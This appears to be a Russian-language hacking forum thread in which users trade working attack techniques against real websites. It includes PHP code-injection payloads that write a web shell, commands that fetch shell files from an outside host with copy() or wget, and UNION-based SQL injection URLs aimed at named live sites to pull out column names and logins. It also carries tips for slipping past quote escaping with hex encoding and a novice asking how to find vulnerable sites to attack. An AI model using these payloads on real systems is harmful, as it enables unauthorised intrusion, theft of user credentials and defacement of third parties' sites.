4, можно ставить больше, сколько угодно (в пределах макс длины урл), ибо дальше корня не пойти это когда pg.php стал папкой?
Нашел уязвимость, отсылаю пост запрос с содержимым: $modi=<?php phpinfo(); ?> все выводится. Но когда пытаюсь отослать запрос с кавычкой, получаю ошибку: <b>Warning</b>: Unexpected character in input: '\' (ASCII=92) state=1 in <b>/h Подскажите в какую сторону копать, чтобы залить шелл. Например вот так: file_put_contents($_SERVER[DOCUMENT_ROOT].DIRECTORY_SEPARATOR.'1.php','111'; только как избавится от кавычек?
copy($_GET[a],$_GET); через гет отправь a=http://site.ru/shell.txt&b=/var/www/html/shell.php если shell_exec не отключено, то можно и print(`wget http://site.ru/shell.php`); или curl
Благодарю, все получилось, +1 прием в голову PHP: Dim url as String = "example.com" Dim postdata As String = "modi=<?php $ff = file_get_contents($_GET[ldir]); file_put_contents($_GET[scdir],$ff); ?>" openurl = "http://" & url & "/scriptname.php?scdir=/var/chroot/site/readme.php&ldir=http://yousite.ru/1.txt"
Насчет быжных сайтов на компе так я хотел бы тренироваться в интернете , так забавней ) А насчет впн , так я хотел бы пока обойтись простыми и не популярными сайтами для тренировки чтобы не нужно было сильно прятаться и заодно бесплатно , или для хорошего опыта желательно поставить впн и потренироваться имено на серьёзных сайтах. Что посоветуешь? Я новичок и хочу научиться , поэтому я обращяюсь за советом поскольку ничего не знаю ) Спасибо. И как найти простые сайты с xss ? Просто лазить по разным сайтам и искать или можно как то через гугл найти кучу простых сайтов а потом в них уже искать уязвимость?
помогите залить шелл, есть права админа, есть форум (какой-то самописный походу), есть даже загрузка файлов, но блин куда файлы заливаются не могу понять, дело в том что они вызиваются функцыей files.php?act=3,
Очень часто сталкиваюсь вот с такой проблемой, при запросе вида.php?id=-1+union+select+1,2,group_concat(column_name)+from+information_schema.columns+where+table_name='Shop_user'+--+ Пишет ошибку: ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'Shop_user\' --' at line 1 Тоесть ругается на кавычки чтоль? Пробывал 'Shop_user' шифровать. При шифровке выводится стиль страницы с пустым содержимым. Тоесть на месте принтабельного поля ничего нету. Помогите пожалуйсто.
Попробуй подставить в параметр act имя несуществуещего файла или подставь кавычку, слеши, вообщем вызови таким образом ошибку. После этого увидишь путь Failed to open stream.. бла бла... /home/path/htdos/files/nesuch_file.php Если не поможет, то попробуй угадать названия папок, может листинг есть. 2York, у тебя mq=on, поэтому загони имя таблицы в hex. Тогда синтаксис будет таков: Code: table_name=0x53686f705f2075736572--+a
Не.. никак.. вот ссыль http://neoklimat.ru/pages.php?id=-1+union+select+1,group_concat(column_name),3+from+information_schema.columns+where+table_name=0x53686f705f2075736572+--+
http://neoklimat.ru/pages.php?id=-1+union+select+1,column_name,3+from+information_schema.columns+where+table_name=0x53686F705F75736572+limit+0,20+--+ вот так катит просто перебором делай, через limit
Ereee, нету там (в моем вопросе) листинга директорий, подставлял неверный запрос просто пустая страница(
2pirat0, скинь URL в ЛС. 2York, Все выводится: http://neoklimat.ru/pages.php?id=-1+union+select+1,group_concat(column_name),3+from+information_schema.columns+where+table_name=0x53686F705F75736572--
www.vizborclub.com/vizborclub/photos_albom.php?id=-51+union+select+1,2,3,login+from+unhex0x27757365727327+--+ А тут в чем дело? Не отображаются уже логины с паролями, перебором через лимит не получается.
Во-первых синтаксис не верный. Во-вторых в конце запроса имя таблицы нельзя в хекс переводить(да и нафиг нужен). P.S. Дам твой дефейс стоит, нафиг тебе скулья?
